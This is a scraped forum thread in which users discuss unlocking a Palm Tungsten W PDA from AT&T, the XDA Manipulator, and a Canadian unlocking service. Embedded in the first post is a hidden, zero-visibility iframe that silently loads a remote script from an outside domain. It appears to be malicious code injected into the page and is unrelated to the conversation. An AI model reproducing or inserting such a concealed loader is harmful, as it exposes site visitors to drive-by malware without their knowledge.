Unlocking Tungsten W to work with any carrier

Hopefully, my PDA will arrive next week. I use Tmobile and AT&T coverage isn't very good in my area. If the phone comes locked for only AT&T and since they don't unlock phones, is anybody else thinking about using the XDA manipulator to unlock this PDA?

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Won't work

The XDA Manipulator program is for the XDA... totally different phone. I believe you will be required to use this with AT&T Wireless. They don't give unlock codes at all, so unless someone comes up with a back door... which is probable....

From what I understand you can get the Palm Tungsten W without getting the version specifically for AWS. I am not sure what the sales channels are though. We are not actually stocking the devices in our stores but we do have several offers with Palm so it is a bit more highlighted with us. It should be available with other carriers if not now very soon.

Thanks.

XDA manipulator cannot unlock the T|W nor will it likely in the future. HTC did not protect the SIM lock very well in the Pocket PC's but Palm did a very excellent job. But not good enough as we have made the unlocking solution.

Unlocked dub-yas

My unlocked dub-ya came from Canada. Rogers ATT up there did not rely on chaining you to them, instead substituting service (what a thought!)

I've heard other folks say their dub-yas ain't locked, but I can't confirm that. Check other posts here, as well as posting to comp.sys.palmtops.pilot and alt.cellular.gsm.carriers.voicestream in USENET.

unlocking T|W

You can get the T|W unlocked & memory flashed at Bongo Wireless in Canada. But I am not sure what that does to your PalmOne warranty. Anybody know cons of unlocking T|W (US model locked to AT&T). I dumped AT&T because they don't cover major areas south an east of DC and am now stuck with T|W. Thinking about selling it. Anybody interested? Of course if you like AT&T it will work fine as is!

unlocking T|W

Bongo says they remove the locks and flash the memory. I presume that means you have to reload other apps you might have installed. This is contact info for them:

Sadly, remote is not possible because of the way that the unit is designed. Flashing a new ROM update is sometimes not neccessary but in some cases we have to and yes, ROM updates usually include deletion of aplication. This is why we ask you to back up all your data. I am sure that 99% T/W owners do this.

You can email me at kevin@bongowireless.com or call 905-709-1411, we are just outside Toronto, Canada.

Kevin Haffenden
